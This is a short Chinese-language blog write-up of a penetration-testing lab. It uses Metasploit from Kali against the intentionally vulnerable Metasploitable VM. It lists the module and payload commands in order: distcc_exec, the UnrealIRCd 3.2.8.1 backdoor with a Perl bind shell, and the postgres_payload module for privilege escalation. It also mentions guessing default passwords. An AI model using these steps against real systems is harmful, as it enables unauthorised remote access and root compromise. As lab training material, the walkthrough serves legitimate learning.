MSF模拟渗透测试攻击linux实例
文章目录
前言
一、靶机metasploitable的使用
靶机MSF是一个linux的靶机漏洞平台,自身存在着很多漏洞,可以进行利用,本次就进行kali对linux的一次渗透攻击。
二、利用kali攻击linux获得会话进行提权
1.利用MSF本身存在的后门漏洞进行攻击
(1)首先下载好靶机MSF,打开kali,使用弱口令或者在百度上查询MSF的默认登录密码进行破解密码。
主机:kali
目标主机:MSF(linux)

登录成功后,输入ifconfig,出现ip地址192.18.222.1
(2)登录kali的MSF
使用靶机存在的后门漏洞模块
search distcc
use exploit/unix/misc/distcc_exec

(3)options查看参数
set rhosts 192.168.222.1
run后发现没有选择payload

(4)选择payload
show payloads
set payload payload/cmd/unix/bind_perl

发现distcc模块行不通,利用另一个模块(在百度上找的)
use exploit/unix/irc/unreal_ircd_3281_backdoor

show payloads
set payload payload/cmd/unix/bind_perl
设置好payload后,设置ip地址
options
set rhosts 192.168.222.1

(5)run,出现shell,background,输入y
输入sessions,查看会话信息

sessions -u 3,使用会话
使用攻击模块
use exploit/linux/postgres/postgres_payload
options

(6)设置ip地址,run

提权成功,成功进入会话。
2.使用攻击模块,进入会话,提权成功
查看id,端口信息

进入会话,提权成功,实验结束。
总结
本次实验是MSF攻击linux的一次渗透测试实例,利用相对应的模块进行攻击提权利用,掌握攻击linux,提权模块的使用原理。
7514

被折叠的 条评论
为什么被折叠?



